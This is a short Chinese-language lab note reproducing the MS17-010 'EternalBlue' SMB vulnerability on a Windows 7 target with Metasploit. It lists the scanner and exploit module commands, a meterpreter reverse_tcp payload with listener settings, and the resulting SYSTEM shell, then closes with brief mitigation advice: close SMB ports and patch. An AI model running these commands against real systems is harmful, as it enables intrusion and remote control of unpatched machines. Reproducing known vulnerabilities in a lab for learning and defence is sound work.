前言:小编也是现学现卖,方便自己记忆,写的不好的地方还请包涵,也欢迎各位大佬多多批评指正。
MS17_010 “永恒之蓝”漏洞复现
靶场环境: win2007 、 kali
使用工具: MSF
前提条件:
1.win2007 开放了445端口且没有打补丁
2.kali 和 win2007 在同网段下
*============================================*
1.进入msf,使用search 搜素 MSF17_010的路径
sudo msfconsole
search MS17_010
模块设置:
use auxiliary/scanner/smb/smb_ms17_010 //进入该辅助模块
set RHOSTS 192.168.0.10/24 //设置目标网段
set THREADS 50 //设置线程
run //直接运行扫描
发现ip前面有 + 号
扫描出 192.168.0.102:445 存在永恒之蓝漏洞
*============================================*
2.进入MSF17_010的攻击模块
use exploit/windows/smb/ms17_010_eternalblue
//利用该攻击模块进行攻击
set payload windows/x64/meterpreter/reverse_tcp
//不使用默认的payload攻击载荷模块,使用该模块主要是稳定
set RHOSTS 192.168.0.102
set LHOST 192.168.0.107 //返回主机 是我 kali 的ip地址
set LPORT 1111 //修改攻击机的端口,可选择设置
exploit
shell //攻击成功 拿到wind7的system32权限
*============================================*
漏洞防御:
1.关闭445,137,138,139,等网络共享端口
2.下载补丁,补丁地址